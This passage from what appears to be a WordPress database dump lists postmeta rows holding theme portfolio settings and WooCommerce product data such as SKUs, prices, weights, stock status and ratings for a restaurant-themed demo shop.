Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(54538,2932,'mkdf_portfolio_single_template_meta','small-images'),(54539,2932,'_wp_old_slug','h1-2-2'),(54540,2932,'_wp_old_slug','h2-1'),(54541,2932,'_wp_old_slug','h7-6'),(54542,2932,'_dp_original','1048'),(54543,2933,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54544,2933,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54545,2933,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54546,2933,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54547,2933,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54548,2933,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54549,2933,'mkdf_page_content_behind_header_meta','no'),(54550,2933,'mkdf_page_content_padding','115px 0 100px 0'),(54551,2933,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(54552,2933,'portfolio_single_back_to_link','1008'),(54553,2933,'mkdf_disable_vertical_header_background_image_meta','no'),(54554,2933,'mkdf_disable_header_widget_areas_meta','no'),(54555,2933,'slide_template','default'),(54556,2933,'_wpb_vc_js_status','true'),(54557,2933,'mkdf-portfolio-image-gallery','567,566,565'),(54558,2933,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:10:\"John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(54559,2933,'mkdf_portfolio_single_template_meta','slider'),(54560,2933,'_thumbnail_id','1030'),(54561,2933,'_wp_old_slug','h7-5'),(54562,2933,'_dp_original','1047'),(54563,2934,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54564,2934,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54565,2934,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54566,2934,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54567,2934,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54568,2934,'_thumbnail_id','2204'),(54569,2934,'mkdf_page_content_behind_header_meta','no'),(54570,2934,'mkdf_page_content_padding','115px 0 100px 0'),(54571,2934,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(54572,2934,'portfolio_single_back_to_link','1008'),(54573,2934,'mkdf_disable_vertical_header_background_image_meta','no'),(54574,2934,'mkdf_disable_header_widget_areas_meta','no'),(54575,2934,'slide_template','default'),(54576,2934,'_wpb_vc_js_status','true'),(54577,2934,'mkdf-portfolio-image-gallery','567,566,565'),(54578,2934,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(54579,2934,'mkdf_portfolio_single_template_meta','small-images'),(54580,2934,'_wp_old_slug','h1-2-2'),(54581,2934,'_wp_old_slug','h2-1'),(54582,2934,'_wp_old_slug','h7-4'),(54583,2934,'_dp_original','1019'),(54584,2935,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54585,2935,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54586,2935,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54587,2935,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54588,2935,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54589,2935,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54590,2935,'mkdf_page_content_behind_header_meta','no'),(54591,2935,'mkdf_page_content_padding','115px 0 100px 0'),(54592,2935,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(54593,2935,'portfolio_single_back_to_link','1008'),(54594,2935,'mkdf_disable_vertical_header_background_image_meta','no'),(54595,2935,'mkdf_disable_header_widget_areas_meta','no'),(54596,2935,'slide_template','default'),(54597,2935,'_wpb_vc_js_status','true'),(54598,2935,'mkdf-portfolio-image-gallery','567,566,565'),(54599,2935,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(54600,2935,'mkdf_portfolio_single_template_meta','gallery'),(54601,2935,'_thumbnail_id','2202'),(54602,2935,'_wp_old_slug','h7-1'),(54603,2935,'_dp_original','1022'),(54604,2936,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54605,2936,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54606,2936,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54607,2936,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54608,2936,'mkdf_page_content_behind_header_meta','no'),(54609,2936,'mkdf_page_content_padding','115px 0 100px 0'),(54610,2936,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(54611,2936,'portfolio_single_back_to_link','610'),(54612,2936,'mkdf_disable_vertical_header_background_image_meta','no'),(54613,2936,'mkdf_disable_header_widget_areas_meta','no'),(54614,2936,'slide_template','default'),(54615,2936,'_wpb_vc_js_status','false'),(54616,2936,'mkdf-portfolio-image-gallery','565,566,567'),(54617,2936,'mkdf_portfolio_single_template_meta','images'),(54618,2936,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(54619,2936,'_thumbnail_id','1103'),(54620,2936,'_wp_old_slug','h6-9'),(54621,2936,'_dp_original','660'),(54622,2937,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54623,2937,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54624,2937,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54625,2937,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54626,2937,'mkdf_page_content_behind_header_meta','no'),(54627,2937,'mkdf_page_content_padding','115px 0 100px 0'),(54628,2937,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(54629,2937,'portfolio_single_back_to_link','610'),(54630,2937,'mkdf_disable_vertical_header_background_image_meta','no'),(54631,2937,'mkdf_disable_header_widget_areas_meta','no'),(54632,2937,'slide_template','default'),(54633,2937,'_wpb_vc_js_status','false'),(54634,2937,'mkdf-portfolio-image-gallery','565,566,567'),(54635,2937,'mkdf_portfolio_single_template_meta','images'),(54636,2937,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(54637,2937,'_thumbnail_id','1103'),(54638,2937,'_wp_old_slug','h6-9'),(54639,2937,'_dp_original','660'),(54640,2937,'_wp_old_slug','ice-dream-3__trashed'),(54641,2938,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54642,2938,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54643,2938,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54644,2938,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54645,2938,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54646,2938,'mkdf_page_content_behind_header_meta','no'),(54647,2938,'mkdf_page_content_padding','115px 0 100px 0'),(54648,2938,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(54649,2938,'portfolio_single_back_to_link','610'),(54650,2938,'mkdf_disable_vertical_header_background_image_meta','no'),(54651,2938,'mkdf_disable_header_widget_areas_meta','no'),(54652,2938,'slide_template','default'),(54653,2938,'_wpb_vc_js_status','true'),(54654,2938,'mkdf-portfolio-image-gallery','567,566,565'),(54655,2938,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(54656,2938,'mkdf_portfolio_single_template_meta','small-images'),(54657,2938,'_thumbnail_id','1102'),(54658,2938,'_wp_old_slug','h6-8'),(54659,2938,'_dp_original','659'),(54660,2939,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54661,2939,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54662,2939,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54663,2939,'mkdf_page_content_behind_header_meta','no'),(54664,2939,'mkdf_page_content_padding','115px 0 100px 0'),(54665,2939,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(54666,2939,'portfolio_single_back_to_link','610'),(54667,2939,'mkdf_disable_vertical_header_background_image_meta','no'),(54668,2939,'mkdf_disable_header_widget_areas_meta','no'),(54669,2939,'slide_template','default'),(54670,2939,'_wpb_vc_js_status','false'),(54671,2939,'mkdf-portfolio-image-gallery','565,566,567'),(54672,2939,'mkdf_portfolio_single_template_meta','images'),(54673,2939,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(54674,2939,'_thumbnail_id','1101'),(54675,2939,'_wp_old_slug','h6-7'),(54676,2939,'_dp_original','648'),(54677,2940,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54678,2940,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54679,2940,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54680,2940,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54681,2940,'mkdf_page_content_behind_header_meta','no'),(54682,2940,'mkdf_page_content_padding','115px 0 100px 0'),(54683,2940,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(54684,2940,'portfolio_single_back_to_link','610'),(54685,2940,'mkdf_disable_vertical_header_background_image_meta','no'),(54686,2940,'mkdf_disable_header_widget_areas_meta','no'),(54687,2940,'slide_template','default'),(54688,2940,'_wpb_vc_js_status','true'),(54689,2940,'mkdf-portfolio-image-gallery','567,566,565'),(54690,2940,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(54691,2940,'mkdf_portfolio_single_template_meta','small-images'),(54692,2940,'_thumbnail_id','1121'),(54693,2940,'_wp_old_slug','h6-6'),(54694,2940,'_dp_original','649'),(54695,2941,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54696,2941,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54697,2941,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54698,2941,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54699,2941,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54700,2941,'mkdf_page_content_behind_header_meta','no'),(54701,2941,'mkdf_page_content_padding','115px 0 100px 0'),(54702,2941,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(54703,2941,'portfolio_single_back_to_link','610'),(54704,2941,'mkdf_disable_vertical_header_background_image_meta','no'),(54705,2941,'mkdf_disable_header_widget_areas_meta','no'),(54706,2941,'slide_template','default'),(54707,2941,'_wpb_vc_js_status','true'),(54708,2941,'mkdf-portfolio-image-gallery','567,566,565'),(54709,2941,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(54710,2941,'mkdf_portfolio_single_template_meta','gallery'),(54711,2941,'_thumbnail_id','1099'),(54712,2941,'_wp_old_slug','h6-5'),(54713,2941,'_dp_original','645'),(54714,2942,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54715,2942,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54716,2942,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54717,2942,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54718,2942,'mkdf_page_content_behind_header_meta','no'),(54719,2942,'mkdf_page_content_padding','115px 0 100px 0'),(54720,2942,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(54721,2942,'portfolio_single_back_to_link','610'),(54722,2942,'mkdf_disable_vertical_header_background_image_meta','no'),(54723,2942,'mkdf_disable_header_widget_areas_meta','no'),(54724,2942,'slide_template','default'),(54725,2942,'_wpb_vc_js_status','true'),(54726,2942,'mkdf-portfolio-image-gallery','565,566,567'),(54727,2942,'mkdf_portfolio_single_template_meta','small-slider'),(54728,2942,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(54729,2942,'_thumbnail_id','1097'),(54730,2942,'_wp_old_slug','h6-4'),(54731,2942,'_wp_old_slug','cream-soup'),(54732,2942,'_dp_original','644'),(54733,3770,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54734,3770,'slide_template','default'),(54735,3770,'mkdf_page_content_behind_header_meta','no'),(54736,3770,'mkdf_video_type_meta','social_networks'),(54737,3770,'mkdf_audio_type_meta','social_networks'),(54738,3770,'mkdf_disable_vertical_header_background_image_meta','no'),(54739,3770,'mkdf_disable_header_widget_areas_meta','no'),(54740,3770,'mkdf_show_title_area_meta','yes'),(54741,3770,'mkdf_title_area_type_meta','attika'),(54742,3770,'_mkdf-like','0'),(54743,3770,'_thumbnail_id','8'),(54744,3770,'_wpb_vc_js_status','true'),(54745,3770,'mkdf_page_content_padding','120px 0 0'),(54746,3770,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(54747,3770,'_wp_old_date','2018-07-27'),(54748,3106,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54749,3106,'_wc_review_count','1'),(54750,3106,'_wc_rating_count','a:1:{i:4;i:1;}'),(54751,3106,'_wc_average_rating','4.00'),(54752,3106,'_thumbnail_id','38'),(54753,3106,'mkdf_show_new_sign_woo_meta','no'),(54754,3106,'_sku','PR0014'),(54755,3106,'_regular_price','48'),(54756,3106,'_sale_price',''),(54757,3106,'_sale_price_dates_from',''),(54758,3106,'_sale_price_dates_to',''),(54759,3106,'total_sales','0'),(54760,3106,'_tax_status','taxable'),(54761,3106,'_tax_class',''),(54762,3106,'_manage_stock','no'),(54763,3106,'_backorders','no'),(54764,3106,'_sold_individually','no'),(54765,3106,'_weight','310'),(54766,3106,'_length',''),(54767,3106,'_width',''),(54768,3106,'_height',''),(54769,3106,'_upsell_ids','a:0:{}'),(54770,3106,'_crosssell_ids','a:0:{}'),(54771,3106,'_purchase_note',''),(54772,3106,'_default_attributes','a:0:{}'),(54773,3106,'_virtual','no'),(54774,3106,'_downloadable','no'),(54775,3106,'_product_image_gallery',''),(54776,3106,'_download_limit','-1'),(54777,3106,'_download_expiry','-1'),(54778,3106,'_stock',''),(54779,3106,'_stock_status','instock'),(54780,3106,'_product_version','3.4.3'),(54781,3106,'_price','48'),(54782,3106,'slide_template','default'),(54783,3106,'_wpb_vc_js_status','false'),(54784,3106,'_wp_old_slug','crispy-sesame-cake'),(54785,3106,'_wp_old_slug','charleston-shrimp-grits'),(54786,3106,'_wp_old_slug','garnished-charleston-shrimp'),(54787,3106,'_wp_old_slug','garnished-magnolias-shrimp'),(54788,98,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54789,98,'_sku','PR0015'),(54790,98,'_regular_price','67'),(54791,98,'_sale_price',''),(54792,98,'_sale_price_dates_from',''),(54793,98,'_sale_price_dates_to',''),(54794,98,'total_sales','0'),(54795,98,'_tax_status','taxable'),(54796,98,'_tax_class',''),(54797,98,'_manage_stock','no'),(54798,98,'_backorders','no'),(54799,98,'_sold_individually','no'),(54800,98,'_weight','400'),(54801,98,'_length',''),(54802,98,'_width',''),(54803,98,'_height',''),(54804,98,'_upsell_ids','a:0:{}'),(54805,98,'_crosssell_ids','a:0:{}'),(54806,98,'_purchase_note',''),(54807,98,'_default_attributes','a:0:{}'),(54808,98,'_virtual','no'),(54809,98,'_downloadable','no'),(54810,98,'_product_image_gallery',''),(54811,98,'_download_limit','-1'),(54812,98,'_download_expiry','-1'),(54813,98,'_thumbnail_id','39'),(54814,98,'_stock',''),(54815,98,'_stock_status','instock'),(54816,98,'_wc_average_rating','3.50'),(54817,98,'_wc_rating_count','a:2:{i:3;i:1;i:4;i:1;}'),(54818,98,'_wc_review_count','2'),(54819,98,'_downloadable_files','a:0:{}'),(54820,98,'_product_attributes','a:0:{}'),(54821,98,'_product_version','3.4.3'),(54822,98,'_price','67'),(54823,98,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54824,98,'mkdf_show_new_sign_woo_meta','no'),(54825,98,'slide_template','default'),(54826,98,'_wpb_vc_js_status','false'),(54827,98,'_wp_old_slug','tuna-with-crispy-artichoke'),(54828,3107,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54829,3107,'_sku','PR0016'),(54830,3107,'_regular_price','73'),(54831,3107,'_sale_price',''),(54832,3107,'_sale_price_dates_from',''),(54833,3107,'_sale_price_dates_to',''),(54834,3107,'total_sales','0'),(54835,3107,'_tax_status','taxable'),(54836,3107,'_tax_class',''),(54837,3107,'_manage_stock','no'),(54838,3107,'_backorders','no'),(54839,3107,'_sold_individually','no'),(54840,3107,'_weight','250'),(54841,3107,'_length',''),(54842,3107,'_width',''),(54843,3107,'_height',''),(54844,3107,'_upsell_ids','a:0:{}'),(54845,3107,'_crosssell_ids','a:0:{}'),(54846,3107,'_purchase_note',''),(54847,3107,'_default_attributes','a:0:{}'),(54848,3107,'_virtual','no'),(54849,3107,'_downloadable','no'),(54850,3107,'_product_image_gallery',''),(54851,3107,'_download_limit','-1'),(54852,3107,'_download_expiry','-1'),(54853,3107,'_thumbnail_id','40'),(54854,3107,'_stock',''),(54855,3107,'_stock_status','instock'),(54856,3107,'_wc_average_rating','5.00'),(54857,3107,'_wc_rating_count','a:1:{i:5;i:1;}'),(54858,3107,'_wc_review_count','1'),(54859,3107,'_downloadable_files','a:0:{}'),(54860,3107,'_product_attributes','a:0:{}'),(54861,3107,'_product_version','3.4.3'),(54862,3107,'_price','73'),(54863,3107,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54864,3107,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54865,3107,'mkdf_show_new_sign_woo_meta','no'),(54866,3107,'slide_template','default'),(54867,3107,'_wpb_vc_js_status','false'),(54868,3108,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54869,3108,'_sku','PR0017'),(54870,3108,'_regular_price','58'),(54871,3108,'_sale_price',''),(54872,3108,'_sale_price_dates_from',''),(54873,3108,'_sale_price_dates_to',''),(54874,3108,'total_sales','0'),(54875,3108,'_tax_status','taxable'),(54876,3108,'_tax_class',''),(54877,3108,'_manage_stock','no'),(54878,3108,'_backorders','no'),(54879,3108,'_sold_individually','no'),(54880,3108,'_weight','315'),(54881,3108,'_length',''),(54882,3108,'_width',''),(54883,3108,'_height',''),(54884,3108,'_upsell_ids','a:0:{}'),(54885,3108,'_crosssell_ids','a:0:{}'),(54886,3108,'_purchase_note',''),(54887,3108,'_default_attributes','a:0:{}'),(54888,3108,'_virtual','no'),(54889,3108,'_downloadable','no'),(54890,3108,'_product_image_gallery',''),(54891,3108,'_download_limit','-1'),(54892,3108,'_download_expiry','-1'),(54893,3108,'_thumbnail_id','41'),(54894,3108,'_stock',''),(54895,3108,'_stock_status','outofstock'),(54896,3108,'_wc_average_rating','3.00'),(54897,3108,'_wc_rating_count','a:1:{i:3;i:1;}'),(54898,3108,'_wc_review_count','1'),(54899,3108,'_downloadable_files','a:0:{}'),(54900,3108,'_product_attributes','a:0:{}'),(54901,3108,'_product_version','3.4.3'),(54902,3108,'_price','58'),(54903,3108,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54904,3108,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54905,3108,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54906,3108,'mkdf_show_new_sign_woo_meta','no'),(54907,3108,'slide_template','default'),(54908,3108,'_wpb_vc_js_status','false'),(54909,3108,'_wp_old_slug','gadabout-with-salad'),(54910,3109,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54911,3109,'_sku','PR0018'),(54912,3109,'_regular_price','80'),(54913,3109,'_sale_price','72'),(54914,3109,'_sale_price_dates_from',''),(54915,3109,'_sale_price_dates_to',''),(54916,3109,'total_sales','0'),(54917,3109,'_tax_status','taxable'),(54918,3109,'_tax_class',''),(54919,3109,'_manage_stock','no'),(54920,3109,'_backorders','no'),(54921,3109,'_sold_individually','no'),(54922,3109,'_weight','215'),(54923,3109,'_length',''),(54924,3109,'_width',''),(54925,3109,'_height',''),(54926,3109,'_upsell_ids','a:0:{}'),(54927,3109,'_crosssell_ids','a:0:{}'),(54928,3109,'_purchase_note',''),(54929,3109,'_default_attributes','a:0:{}'),(54930,3109,'_virtual','no'),(54931,3109,'_downloadable','no'),(54932,3109,'_product_image_gallery',''),(54933,3109,'_download_limit','-1'),(54934,3109,'_download_expiry','-1'),(54935,3109,'_thumbnail_id','42'),(54936,3109,'_stock',''),(54937,3109,'_stock_status','instock'),(54938,3109,'_wc_average_rating','5.00'),(54939,3109,'_wc_rating_count','a:1:{i:5;i:1;}'),(54940,3109,'_wc_review_count','1'),(54941,3109,'_downloadable_files','a:0:{}'),(54942,3109,'_product_attributes','a:0:{}'),(54943,3109,'_product_version','3.4.3'),(54944,3109,'_price','72'),(54945,3109,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54946,3109,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54947,3109,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54948,3109,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54949,3109,'mkdf_show_new_sign_woo_meta','no'),(54950,3109,'slide_template','default'),(54951,3109,'_wpb_vc_js_status','false'),(54952,3110,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54953,3110,'_sku','PR0019'),(54954,3110,'_regular_price','67'),(54955,3110,'_sale_price',''),(54956,3110,'_sale_price_dates_from',''),(54957,3110,'_sale_price_dates_to',''),(54958,3110,'total_sales','0'),(54959,3110,'_tax_status','taxable'),(54960,3110,'_tax_class',''),(54961,3110,'_manage_stock','no'),(54962,3110,'_backorders','no'),(54963,3110,'_sold_individually','no'),(54964,3110,'_weight','150'),(54965,3110,'_length',''),(54966,3110,'_width',''),(54967,3110,'_height',''),(54968,3110,'_upsell_ids','a:0:{}'),(54969,3110,'_crosssell_ids','a:0:{}'),(54970,3110,'_purchase_note',''),(54971,3110,'_default_attributes','a:0:{}'),(54972,3110,'_virtual','no'),(54973,3110,'_downloadable','no'),(54974,3110,'_product_image_gallery',''),(54975,3110,'_download_limit','-1'),(54976,3110,'_download_expiry','-1'),(54977,3110,'_thumbnail_id','43'),(54978,3110,'_stock',''),(54979,3110,'_stock_status','instock'),(54980,3110,'_wc_average_rating','4.00'),(54981,3110,'_wc_rating_count','a:1:{i:4;i:1;}'),(54982,3110,'_wc_review_count','1'),(54983,3110,'_downloadable_files','a:0:{}'),(54984,3110,'_product_attributes','a:0:{}'),(54985,3110,'_product_version','3.4.3'),(54986,3110,'_price','67'),(54987,3110,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54988,3110,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54989,3110,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54990,3110,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54991,3110,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54992,3110,'mkdf_show_new_sign_woo_meta','no'),(54993,3110,'slide_template','default'),(54994,3110,'_wpb_vc_js_status','false'),(54995,3111,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54996,3111,'_sku','PR0020'),(54997,3111,'_regular_price','67'),(54998,3111,'_sale_price',''),(54999,3111,'_sale_price_dates_from',''),(55000,3111,'_sale_price_dates_to',''),(55001,3111,'total_sales','0'),(55002,3111,'_tax_status','taxable'),(55003,3111,'_tax_class',''),(55004,3111,'_manage_stock','no'),(55005,3111,'_backorders','no'),(55006,3111,'_sold_individually','no'),(55007,3111,'_weight','150'),(55008,3111,'_length',''),(55009,3111,'_width',''),(55010,3111,'_height',''),(55011,3111,'_upsell_ids','a:0:{}'),(55012,3111,'_crosssell_ids','a:0:{}'),(55013,3111,'_purchase_note',''),(55014,3111,'_default_attributes','a:0:{}'),(55015,3111,'_virtual','no'),(55016,3111,'_downloadable','no'),(55017,3111,'_product_image_gallery',''),(55018,3111,'_download_limit','-1'),(55019,3111,'_download_expiry','-1'),(55020,3111,'_thumbnail_id','44'),(55021,3111,'_stock',''),(55022,3111,'_stock_status','instock'),(55023,3111,'_wc_average_rating','4.00'),(55024,3111,'_wc_rating_count','a:1:{i:4;i:1;}'),(55025,3111,'_wc_review_count','1'),(55026,3111,'_downloadable_files','a:0:{}'),(55027,3111,'_product_attributes','a:0:{}'),(55028,3111,'_product_version','3.4.3'),(55029,3111,'_price','67'),(55030,3111,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55031,3111,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55032,3111,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55033,3111,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55034,3111,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55035,3111,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55036,3111,'mkdf_show_new_sign_woo_meta','no'),(55037,3111,'slide_template',''),(55038,3111,'_wpb_vc_js_status','false'),(55039,177,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55040,177,'_sku','PR0021'),(55041,177,'_regular_price','86'),(55042,177,'_sale_price',''),(55043,177,'_sale_price_dates_from',''),(55044,177,'_sale_price_dates_to',''),(55045,177,'total_sales','0'),(55046,177,'_tax_status','taxable'),(55047,177,'_tax_class',''),(55048,177,'_manage_stock','no'),(55049,177,'_backorders','no'),(55050,177,'_sold_individually','no'),(55051,177,'_weight','180'),(55052,177,'_length',''),(55053,177,'_width',''),(55054,177,'_height',''),(55055,177,'_upsell_ids','a:0:{}'),(55056,177,'_crosssell_ids','a:0:{}'),(55057,177,'_purchase_note',''),(55058,177,'_default_attributes','a:0:{}'),(55059,177,'_virtual','no'),(55060,177,'_downloadable','no'),(55061,177,'_product_image_gallery',''),(55062,177,'_download_limit','-1'),(55063,177,'_download_expiry','-1'),(55064,177,'_thumbnail_id','45'),(55065,177,'_stock',''),(55066,177,'_stock_status','instock'),(55067,177,'_wc_average_rating','5.00'),(55068,177,'_wc_rating_count','a:1:{i:5;i:1;}'),(55069,177,'_wc_review_count','1'),(55070,177,'_downloadable_files','a:0:{}'),(55071,177,'_product_attributes','a:0:{}'),(55072,177,'_product_version','3.4.3'),(55073,177,'_price','86'),(55074,177,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55075,177,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55076,177,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55077,177,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55078,177,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55079,177,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55080,177,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55081,177,'mkdf_show_new_sign_woo_meta','yes'),(55082,177,'slide_template','default'),(55083,177,'_wpb_vc_js_status','false'),(55084,177,'_wp_old_slug','pancakes-with-caviar'),(55085,180,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55086,180,'_sku','PR0022'),(55087,180,'_regular_price','86'),(55088,180,'_sale_price',''),(55089,180,'_sale_price_dates_from',''),(55090,180,'_sale_price_dates_to',''),(55091,180,'total_sales','0'),(55092,180,'_tax_status','taxable'),(55093,180,'_tax_class',''),(55094,180,'_manage_stock','no'),(55095,180,'_backorders','no'),(55096,180,'_sold_individually','no'),(55097,180,'_weight','230'),(55098,180,'_length',''),(55099,180,'_width',''),(55100,180,'_height',''),(55101,180,'_upsell_ids','a:0:{}'),(55102,180,'_crosssell_ids','a:0:{}'),(55103,180,'_purchase_note',''),(55104,180,'_default_attributes','a:0:{}'),(55105,180,'_virtual','no'),(55106,180,'_downloadab